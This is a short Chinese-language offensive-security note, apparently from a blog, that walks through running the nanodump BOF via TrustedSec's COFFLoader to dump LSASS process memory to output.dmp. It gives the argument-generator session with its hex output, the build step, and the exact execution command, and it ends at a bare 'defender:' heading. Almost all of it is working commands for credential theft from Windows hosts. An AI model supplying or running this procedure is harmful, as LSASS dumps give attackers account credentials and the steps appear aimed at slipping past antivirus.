项目地址:
https://github.com/trustedsec/COFFLoader
python3 beacon_generate.py
python3 beacon_generate.py Beacon Argument GeneratorBeacon>addint lsass进程IDBeacon>addString output.dmpBeacon>addint 1Beacon>addint 1Beacon>addint 0Beacon>addint 1Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addString ""Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addString ""Beacon>addint 0Beacon>generateb'59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000'Beacon>
编译文件
cd COFF-master
make
落地执行:
xxxxxxxxxx COFFLoader64.exe go nanodump.x64.o 59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000
defender: